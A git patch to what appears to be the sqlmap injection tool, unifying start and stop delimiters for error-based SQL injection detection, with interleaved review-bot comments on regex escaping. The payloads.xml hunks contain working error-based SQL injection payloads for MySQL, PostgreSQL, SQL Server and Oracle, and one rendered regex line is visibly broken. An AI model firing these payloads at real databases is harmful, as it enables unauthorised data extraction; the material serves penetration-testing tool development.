From 2708aad5040ec724b9eb9957210258d2bf761977 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Wed, 1 Dec 2010 10:31:50 +0000
Subject: [PATCH] Unified start and stop delimiters accross errror-based (detection engine) and union query (--union-test) tests.
---
 lib/core/agent.py | 14 +++++------
 lib/core/settings.py | 4 +---
 lib/techniques/error/use.py | 13 ++++------
 xml/payloads.xml | 48 ++++++++++++++++++-------------------
 4 files changed, 37 insertions(+), 42 deletions(-)
diff --git a/lib/core/agent.py b/lib/core/agent.py
index 9cb58de2b..eb41c7cf8 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -22,8 +22,6 @@ from lib.core.datatype import advancedDict
 from lib.core.enums import DBMS
 from lib.core.enums import PLACE
 from lib.core.exception import sqlmapNoneDataException
-from lib.core.settings import ERROR_START_CHAR
-from lib.core.settings import ERROR_END_CHAR
 from lib.core.settings import PAYLOAD_DELIMITER
 
 class Agent:
@@ -33,9 +31,9 @@ class Agent:
 
     def __init__(self):
         kb.misc = advancedDict()
-        kb.misc.delimiter = randomStr(6)
-        kb.misc.start = randomStr(6)
-        kb.misc.stop = randomStr(6)
+        kb.misc.delimiter = randomStr(length=6)
+        kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True)
+        kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True)
 
     def payloadDirect(self, query):
         if query.startswith("AND "):
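Review bot: The new `kb.misc.start` / `kb.misc.stop` values in `__init__` are an implicit contract with two other places in this commit and nothing here records it: lib/techniques/error/use.py embeds them unescaped both inside a SQL string literal (`"'%s'" % kb.misc.start`) and inside the extraction regex passed to `re.search`, so a marker containing a quote or a regex metacharacter would break the query or the match. The current `":%s:"` around three lowercase letters satisfies that, but only by coincidence of the chosen format. Add above the two assignments: `# start/stop markers are embedded unescaped in SQL string literals and in the error-based extraction regex: keep them free of quotes and regex metacharacters`. `__init__` is fully inside the hunk; the rest of `Agent` is outside it.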
@@ -163,12 +161,14 @@ class Agent:
         randInt = randomInt()
         randInt1 = randomInt()
         randStr = randomStr()
+        randStr1 = randomStr()
 
         payload = payload.replace("[RANDNUM]", str(randInt))
         payload = payload.replace("[RANDNUM1]", str(randInt1))
         payload = payload.replace("[RANDSTR]", randStr)
-        payload = payload.replace("[ERROR_START_CHAR]", ERROR_START_CHAR)
-        payload = payload.replace("[ERROR_END_CHAR]", ERROR_END_CHAR)
+        payload = payload.replace("[RANDSTR1]", randStr1)
+        payload = payload.replace("[DELIMITER_START]", kb.misc.start)
+        payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
         payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
 
         return payload
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 164691a23..8f81986a4 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -46,11 +46,9 @@ DUMP_TAB_MARKER = "__TAB__"
 DUMP_START_MARKER = "__START__"
 DUMP_STOP_MARKER = "__STOP__"
 
-# error based injection markers
+# error-based injection markers
 ERROR_SPACE = ":_:"
 ERROR_EMPTY_CHAR = ":x:"
-ERROR_START_CHAR = ":s:"
-ERROR_END_CHAR = ":e:"
 
 PAYLOAD_DELIMITER = "\x00"
 
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 6a0286fbf..7e71bb493 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -27,8 +27,6 @@ from lib.utils.resume import resume
 
 from lib.core.settings import ERROR_SPACE
 from lib.core.settings import ERROR_EMPTY_CHAR
-from lib.core.settings import ERROR_START_CHAR
-from lib.core.settings import ERROR_END_CHAR
 
 def errorUse(expression, returnPayload=False):
     """
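Review bot: The `[DELIMITER_START]` / `[DELIMITER_STOP]` substitution now reads per-run values from `kb.misc` instead of module constants, and the hunk does not say where those values are set or who else depends on them; anyone re-assigning `kb.misc.start` after payloads have been sent would silently desynchronise this replacement from the grep that looks for the same markers in the response. Add above the two new `replace` lines: `# per-run markers set once in Agent.__init__; the error-based grep in lib/techniques/error/use.py matches on the same values`. The enclosing method starts outside the hunk.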
@@ -55,21 +53,20 @@ def errorUse(expression, returnPayload=False):
 
         expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
         expressionUnescaped = unescaper.unescape(expressionReplaced)
-        startLimiter = unescaper.unescape("'%s'" % ERROR_START_CHAR)
-        endLimiter = unescaper.unescape("'%s'" % ERROR_END_CHAR)
+        startLimiter = unescaper.unescape("'%s'" % kb.misc.start)
+        endLimiter = unescaper.unescape("'%s'" % kb.misc.stop)
     else:
         expressionUnescaped = kb.misc.handler.unescape(expression)
-        startLimiter = kb.misc.handler.unescape("'%s'" % ERROR_START_CHAR)
-        endLimiter = kb.misc.handler.unescape("'%s'" % ERROR_END_CHAR)
+        startLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.start)
+        endLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.stop)
 
     forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
-
     debugMsg = "query: %s" % forgedQuery
     logger.debug(debugMsg)
 
     payload = agent.payload(newValue=forgedQuery)
     result = Request.queryPage(payload, content=True)
-    match = re.search('%s(?P.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
+    match = re.search('%s(?P.*?)%s' % (kb.misc.start, kb.misc.stop), result[0], re.DOTALL | re.IGNORECASE)
 
     if match:
         output = match.group('result')
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 895624176..7aaccbf27 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -620,10 +620,10 @@ Formats: 1 1 - AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
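Review bot: The new `re.search` line interpolates `kb.misc.start` and `kb.misc.stop` into the pattern without `re.escape`, so the extraction is only correct as long as `Agent.__init__` keeps producing markers with no regex metacharacters; the old `:s:` / `:e:` constants had the same property, but with the values now generated elsewhere the dependency is invisible at this call site. Escaping costs nothing and removes the coupling: `match = re.search('%s(?P<result>.*?)%s' % (re.escape(kb.misc.start), re.escape(kb.misc.stop)), result[0], re.DOTALL | re.IGNORECASE)`. As rendered on this page the group reads `(?P.*?)`, which is not valid syntax; presumably the `<result>` name was lost in rendering, since `match.group('result')` two lines below and the `<grep>` patterns in xml/payloads.xml both use it. The xml `<grep>` patterns have the same unescaped-interpolation property once the placeholders are substituted. `errorUse` starts and ends outside the hunk.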
MySQL @@ -639,10 +639,10 @@ Formats: 1 1 - AND [RANDNUM]=CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC) + AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL @@ -657,10 +657,10 @@ Formats: 1 1 - AND [RANDNUM]=CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]')) + AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server @@ -675,10 +675,10 @@ Formats: 1 1 - AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL) + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle @@ -700,10 +700,10 @@ Formats: 2,3 1 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL @@ -719,10 +719,10 @@ Formats: 2,3 1 - (CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC)) + (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL @@ -737,10 +737,10 @@ Formats: 3 1 - (CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]'))) + (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server @@ -755,10 +755,10 @@ Formats: 3 1 - (SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL) + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle @@ -773,10 +773,10 @@ Formats: 2,3 3 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL @@ -792,10 +792,10 @@ Formats: 2,3 3 - (CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC)) + (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL @@ -810,10 +810,10 @@ Formats: 3 3 - (CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]'))) + (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server @@ -828,10 +828,10 @@ Formats: 3 3 - (SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL) + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle